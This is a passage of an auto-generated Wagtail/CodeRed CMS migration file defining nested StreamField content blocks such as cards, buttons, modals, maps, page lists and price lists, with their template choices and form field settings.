wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, 
required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 
1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', wagtail.core.blocks.PageChooserBlock(help_text='Show a preview of pages that are children of the selected page. 
Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))])), ('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', 
wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 
'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))])), ('carousel', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('carousel', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.Carousel'))])), ('modal', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), 
('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('header', wagtail.core.blocks.CharBlock(label='Modal heading', max_length=255, required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), 
('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', 
wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline 
Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', 
wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 
1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', wagtail.core.blocks.PageChooserBlock(help_text='Show a preview of pages that are children of the selected page. 
Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))]))], label='Content')), ('footer', wagtail.core.blocks.StreamBlock([('text', wagtail.core.blocks.CharBlock(icon='fa-file-text-o', label='Simple Text', max_length=255)), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), 
('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], label='Modal footer', required=False))])), ('map', wagtail.core.blocks.StructBlock([('map', cartoview_cms.models.streamfields.Blocks.MapChooserBlock(required=True))])), ('map_catalog', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=240)), ('featured_maps', wagtail.core.blocks.ListBlock(cartoview_cms.models.streamfields.Blocks.FeaturedMapChooser(), label='Featured Maps'))])), ('pricelist', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', 
wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('heading', wagtail.core.blocks.CharBlock(label='Heading', max_length=255, required=False)), ('items', wagtail.core.blocks.StreamBlock([('item', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', required=False)), ('name', wagtail.core.blocks.CharBlock(label='Name', max_length=255, required=True)), ('description', wagtail.core.blocks.TextBlock(label='Description', required=False, rows=4)), ('price', wagtail.core.blocks.CharBlock(help_text='Any text here. Include currency sign if desired.', label='Price', required=True))]))], label='Items'))])), ('reusable_content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('content', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.ReusableContent'))]))], label='Content'))]))], label='Content'))])), ('cardgrid', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/cardgrid_group.html', 'Card group - attached cards of equal size'), ('coderedcms/blocks/cardgrid_deck.html', 'Card deck - separate cards of equal size'), 
('coderedcms/blocks/cardgrid_columns.html', 'Card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom 
CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))]))], label='Content'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML'))], label='Content'))])), ('row', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', 
required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('column_breakpoint', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Always expanded'), ('sm', 'sm - Expand on small screens (phone, 576px) and larger'), ('md', 'md - Expand on medium screens (tablet, 768px) and larger'), ('lg', 'lg - Expand on large screens (laptop, 992px) and larger'), ('xl', 'xl - Expand on extra large screens (wide monitor, 1200px)')], help_text='Screen size at which the column will expand horizontally or stack vertically.', required=False, verbose_name='Column Breakpoint'))])), ('column_size', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Automatically size'), ('12', 'Full row'), ('6', 'Half - 1/2 column'), ('4', 'Thirds - 1/3 column'), ('8', 'Thirds - 2/3 column'), ('3', 'Quarters - 1/4 column'), ('9', 'Quarters - 3/4 column'), ('2', 'Sixths - 1/6 column'), ('10', 'Sixths - 5/6 column'), ('1', 'Twelfths - 1/12 column'), ('5', 'Twelfths - 5/12 column'), ('7', 'Twelfths - 7/12 column'), ('11', 'Twelfths - 11/12 column')], label='Column size', required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], 
label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), 
